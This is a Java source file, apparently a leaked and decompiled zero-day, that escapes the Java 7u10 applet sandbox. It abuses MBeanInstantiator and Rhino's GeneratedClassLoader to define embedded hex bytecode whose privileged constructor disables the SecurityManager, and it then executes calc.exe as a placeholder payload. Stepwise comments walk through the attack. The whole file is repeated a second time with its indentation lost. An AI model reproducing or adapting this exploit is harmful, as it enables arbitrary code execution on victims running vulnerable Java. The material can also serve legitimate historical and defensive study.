/Exploit.java

## Exploit.java
/*
Java 0day 1.7.0_10 decrypted source
Originaly placed on https://damagelab.org/index.php?showtopic=23719&st=0
From Russia with love.
 */

import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles;
import java.lang.invoke.MethodType;
import java.security.AccessController;
import java.security.PrivilegedExceptionAction;

import com.sun.jmx.mbeanserver.JmxMBeanServer;
import com.sun.jmx.mbeanserver.JmxMBeanServerBuilder;
import com.sun.jmx.mbeanserver.MBeanInstantiator;

@SuppressWarnings({ "restriction" })
public class Exploit {

  public static byte[] hex2Byte(String paramString) {
		byte[] arrayOfByte = new byte[paramString.length() / 2];
		for (int i = 0; i < arrayOfByte.length; i++) {
			arrayOfByte[i] = (byte) Integer.parseInt(paramString.substring(2 * i, 2 * i + 2), 16);
		}
		return arrayOfByte;
	}

	public static byte[] B$class_bytes = hex2Byte("CAFEBABE0000003200270A000500180A0019001A07001B0A001C001D07001E07001F0700200100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010001650100154C6A6176612F6C616E672F457863657074696F6E3B010004746869730100034C423B01000D537461636B4D61705461626C6507001F07001B01000372756E01001428294C6A6176612F6C616E672F4F626A6563743B01000A536F7572636546696C65010006422E6A6176610C000800090700210C002200230100136A6176612F6C616E672F457863657074696F6E0700240C002500260100106A6176612F6C616E672F4F626A656374010001420100276A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E01001E6A6176612F73656375726974792F416363657373436F6E74726F6C6C657201000C646F50726976696C6567656401003D284C6A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E3B294C6A6176612F6C616E672F4F626A6563743B0100106A6176612F6C616E672F53797374656D01001273657453656375726974794D616E6167657201001E284C6A6176612F6C616E672F53656375726974794D616E616765723B295600210006000500010007000000020001000800090001000A0000006C000100020000000E2AB700012AB8000257A700044CB1000100040009000C00030003000B000000120004000000080004000B0009000C000D000D000C000000160002000D0000000D000E00010000000E000F001000000011000000100002FF000C00010700120001070013000001001400150001000A0000003A000200010000000C01B80004BB000559B70001B000000002000B0000000A00020000001000040011000C0000000C00010000000C000F0010000000010016000000020017");

	// Decompilation credit to benmmurphy
	// http://www.reddit.com/r/netsec/comments/16b4n1/0day_exploit_fo_java_17u10_spotted_in_the_wild/c7ulpd7
  // basically, it's this, as if this were compiled and saved on disk.
	static class B implements PrivilegedExceptionAction<Object> {
		public B() {
			try {
				AccessController.doPrivileged(this);
			} catch (Exception e) {
			}
		}

		public Object run() {
			// This basically removes the security manager
			System.setSecurityManager(null);
			return new Object();
		}
	}

	@SuppressWarnings("rawtypes")
	public void init() {
		try {
			// ================================================================
			// STEP 0: get introspection objects

			// Conveniences
			ClassLoader null_ClassLoader = null;
			Object[] _zero_args_ = {};

			// "Returns a lookup object which is trusted minimally.
			// It can only be used to create method handles to publicly
			// accessible fields and methods."
			MethodHandles.Lookup lookup = MethodHandles.publicLookup();

			// Used to load the "sun.org.mozilla.javascript.internal.*" classes
			// Looks like these classes load some normally inaccessible
			// libraries. Can't find any good documentation on them.
			MBeanInstantiator localMBeanInstantiator = ((JmxMBeanServer) new JmxMBeanServerBuilder().newMBeanServer("",
					null, null)).getMBeanInstantiator();

			// Used to invoke reflection on the javascript classes
			// method type: MethodHandle <method> (Class, String, MethodType)
			MethodType mt_MethodHandle__Class_String_MethodType = MethodType.methodType(MethodHandle.class,
					Class.class, new Class[] { String.class, MethodType.class });

			// MethodHandles.Lookup.findVirtual(Class, String, MethodType)
			MethodHandle MethodHandles$Lookup$findVirtual = lookup.findVirtual(MethodHandles.Lookup.class,
					"findVirtual", mt_MethodHandle__Class_String_MethodType);

			// method type: MethodHandle <method> (Class, MethodType)
			MethodType mt_MethodHandle__Class_MethodType = MethodType.methodType(MethodHandle.class, Class.class,
					new Class[] { MethodType.class });

			// MethodHandles.Lookup.findConstructor(Class, MethodType)
			MethodHandle MethodHandles$Lookup$findConstructor = lookup.findVirtual(MethodHandles.Lookup.class,
					"findConstructor", mt_MethodHandle__Class_MethodType);

			// ================================================================
			// STEP 1: Load the GeneratedClassLoader interface that declares a
			// public
			// "defineClass" method so we can take our bytes and turn it into a
			// live Java Class.
			Class GeneratedClassLoader$class = localMBeanInstantiator.findClass(
					"sun.org.mozilla.javascript.internal.GeneratedClassLoader", null_ClassLoader);

			// ================================================================
			// STEP 2: Create a Javascript "Context" to get a reference to a
			// Javascript GeneratedClassLoader via
			// "Context.createClassLoader(ClassLoader)".
			Class Context$class = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context",
					null_ClassLoader);
			MethodType mt_Void__Void = MethodType.methodType(Void.TYPE);
			MethodHandle Context$Context = (MethodHandle) MethodHandles$Lookup$findConstructor
					.invokeWithArguments(new Object[] { lookup, Context$class, mt_Void__Void });
			Object jsContext = Context$Context.invokeWithArguments(_zero_args_);

			// ================================================================
			// STEP 3: Create a GeneratedClassLoader object.
			MethodType mt_GeneratedClassLoader__ClassLoader = MethodType.methodType(GeneratedClassLoader$class,
					ClassLoader.class);
			MethodHandle Context$createClassLoader = (MethodHandle) MethodHandles$Lookup$findVirtual
					.invokeWithArguments(new Object[] { lookup, Context$class, "createClassLoader",
							mt_GeneratedClassLoader__ClassLoader });
			Object generatedClassLoader = Context$createClassLoader
					.invokeWithArguments(new Object[] { jsContext, null });

			// ================================================================
			// STEP 4: Define the class "B" - the bytes "B$class_bytes" is
			// basically what you would get "on disk" if you compiled the "B"
			// class.
			MethodType mt_Class__String_bytearray = MethodType.methodType(Class.class, String.class,
					new Class[] { byte[].class });
			MethodHandle GeneratedClassLoader$defineClass = (MethodHandle) MethodHandles$Lookup$findVirtual
					.invokeWithArguments(new Object[] { lookup, GeneratedClassLoader$class, "defineClass",
							mt_Class__String_bytearray });
			Class B$class = (Class) GeneratedClassLoader$defineClass.invokeWithArguments(new Object[] {
					generatedClassLoader, null, B$class_bytes });

			// ================================================================
			// STEP 5: Create a new "B" object, which disables the security manager in it's constructor
			B$class.newInstance();

			// ================================================================
			// PROFIT!!!1!
			Runtime.getRuntime().exec("calc.exe");
		} catch (Throwable ex) {
		}
	}

}
	/*
	Java 0day 1.7.0_10 decrypted source
	Originaly placed on https://damagelab.org/index.php?showtopic=23719&st=0
	From Russia with love.
	*/

	import java.lang.invoke.MethodHandle;
	import java.lang.invoke.MethodHandles;
	import java.lang.invoke.MethodType;
	import java.security.AccessController;
	import java.security.PrivilegedExceptionAction;

	import com.sun.jmx.mbeanserver.JmxMBeanServer;
	import com.sun.jmx.mbeanserver.JmxMBeanServerBuilder;
	import com.sun.jmx.mbeanserver.MBeanInstantiator;

	@SuppressWarnings({ "restriction" })
	public class Exploit {

	public static byte[] hex2Byte(String paramString) {
	byte[] arrayOfByte = new byte[paramString.length() / 2];
	for (int i = 0; i < arrayOfByte.length; i++) {
	arrayOfByte[i] = (byte) Integer.parseInt(paramString.substring(2 * i, 2 * i + 2), 16);
	}
	return arrayOfByte;
	}

	public static byte[] B$class_bytes = hex2Byte("CAFEBABE0000003200270A000500180A0019001A07001B0A001C001D07001E07001F0700200100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010001650100154C6A6176612F6C616E672F457863657074696F6E3B010004746869730100034C423B01000D537461636B4D61705461626C6507001F07001B01000372756E01001428294C6A6176612F6C616E672F4F626A6563743B01000A536F7572636546696C65010006422E6A6176610C000800090700210C002200230100136A6176612F6C616E672F457863657074696F6E0700240C002500260100106A6176612F6C616E672F4F626A656374010001420100276A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E01001E6A6176612F73656375726974792F416363657373436F6E74726F6C6C657201000C646F50726976696C6567656401003D284C6A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E3B294C6A6176612F6C616E672F4F626A6563743B0100106A6176612F6C616E672F53797374656D01001273657453656375726974794D616E6167657201001E284C6A6176612F6C616E672F53656375726974794D616E616765723B295600210006000500010007000000020001000800090001000A0000006C000100020000000E2AB700012AB8000257A700044CB1000100040009000C00030003000B000000120004000000080004000B0009000C000D000D000C000000160002000D0000000D000E00010000000E000F001000000011000000100002FF000C00010700120001070013000001001400150001000A0000003A000200010000000C01B80004BB000559B70001B000000002000B0000000A00020000001000040011000C0000000C00010000000C000F0010000000010016000000020017");

	// Decompilation credit to benmmurphy
	// http://www.reddit.com/r/netsec/comments/16b4n1/0day_exploit_fo_java_17u10_spotted_in_the_wild/c7ulpd7
	// basically, it's this, as if this were compiled and saved on disk.
	static class B implements PrivilegedExceptionAction<Object> {
	public B() {
	try {
	AccessController.doPrivileged(this);
	} catch (Exception e) {
	}
	}

	public Object run() {
	// This basically removes the security manager
	System.setSecurityManager(null);
	return new Object();
	}
	}

	@SuppressWarnings("rawtypes")
	public void init() {
	try {
	// ================================================================
	// STEP 0: get introspection objects

	// Conveniences
	ClassLoader null_ClassLoader = null;
	Object[] _zero_args_ = {};

	// "Returns a lookup object which is trusted minimally.
	// It can only be used to create method handles to publicly
	// accessible fields and methods."
	MethodHandles.Lookup lookup = MethodHandles.publicLookup();

	// Used to load the "sun.org.mozilla.javascript.internal.*" classes
	// Looks like these classes load some normally inaccessible
	// libraries. Can't find any good documentation on them.
	MBeanInstantiator localMBeanInstantiator = ((JmxMBeanServer) new JmxMBeanServerBuilder().newMBeanServer("",
	null, null)).getMBeanInstantiator();

	// Used to invoke reflection on the javascript classes
	// method type: MethodHandle <method> (Class, String, MethodType)
	MethodType mt_MethodHandle__Class_String_MethodType = MethodType.methodType(MethodHandle.class,
	Class.class, new Class[] { String.class, MethodType.class });

	// MethodHandles.Lookup.findVirtual(Class, String, MethodType)
	MethodHandle MethodHandles$Lookup$findVirtual = lookup.findVirtual(MethodHandles.Lookup.class,
	"findVirtual", mt_MethodHandle__Class_String_MethodType);

	// method type: MethodHandle <method> (Class, MethodType)
	MethodType mt_MethodHandle__Class_MethodType = MethodType.methodType(MethodHandle.class, Class.class,
	new Class[] { MethodType.class });

	// MethodHandles.Lookup.findConstructor(Class, MethodType)
	MethodHandle MethodHandles$Lookup$findConstructor = lookup.findVirtual(MethodHandles.Lookup.class,
	"findConstructor", mt_MethodHandle__Class_MethodType);

	// ================================================================
	// STEP 1: Load the GeneratedClassLoader interface that declares a
	// public
	// "defineClass" method so we can take our bytes and turn it into a
	// live Java Class.
	Class GeneratedClassLoader$class = localMBeanInstantiator.findClass(
	"sun.org.mozilla.javascript.internal.GeneratedClassLoader", null_ClassLoader);

	// ================================================================
	// STEP 2: Create a Javascript "Context" to get a reference to a
	// Javascript GeneratedClassLoader via
	// "Context.createClassLoader(ClassLoader)".
	Class Context$class = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context",
	null_ClassLoader);
	MethodType mt_Void__Void = MethodType.methodType(Void.TYPE);
	MethodHandle Context$Context = (MethodHandle) MethodHandles$Lookup$findConstructor
	.invokeWithArguments(new Object[] { lookup, Context$class, mt_Void__Void });
	Object jsContext = Context$Context.invokeWithArguments(_zero_args_);

	// ================================================================
	// STEP 3: Create a GeneratedClassLoader object.
	MethodType mt_GeneratedClassLoader__ClassLoader = MethodType.methodType(GeneratedClassLoader$class,
	ClassLoader.class);
	MethodHandle Context$createClassLoader = (MethodHandle) MethodHandles$Lookup$findVirtual
	.invokeWithArguments(new Object[] { lookup, Context$class, "createClassLoader",
	mt_GeneratedClassLoader__ClassLoader });
	Object generatedClassLoader = Context$createClassLoader
	.invokeWithArguments(new Object[] { jsContext, null });

	// ================================================================
	// STEP 4: Define the class "B" - the bytes "B$class_bytes" is
	// basically what you would get "on disk" if you compiled the "B"
	// class.
	MethodType mt_Class__String_bytearray = MethodType.methodType(Class.class, String.class,
	new Class[] { byte[].class });
	MethodHandle GeneratedClassLoader$defineClass = (MethodHandle) MethodHandles$Lookup$findVirtual
	.invokeWithArguments(new Object[] { lookup, GeneratedClassLoader$class, "defineClass",
	mt_Class__String_bytearray });
	Class B$class = (Class) GeneratedClassLoader$defineClass.invokeWithArguments(new Object[] {
	generatedClassLoader, null, B$class_bytes });

	// ================================================================
	// STEP 5: Create a new "B" object, which disables the security manager in it's constructor
	B$class.newInstance();

	// ================================================================
	// PROFIT!!!1!
	Runtime.getRuntime().exec("calc.exe");
	} catch (Throwable ex) {
	}
	}

	}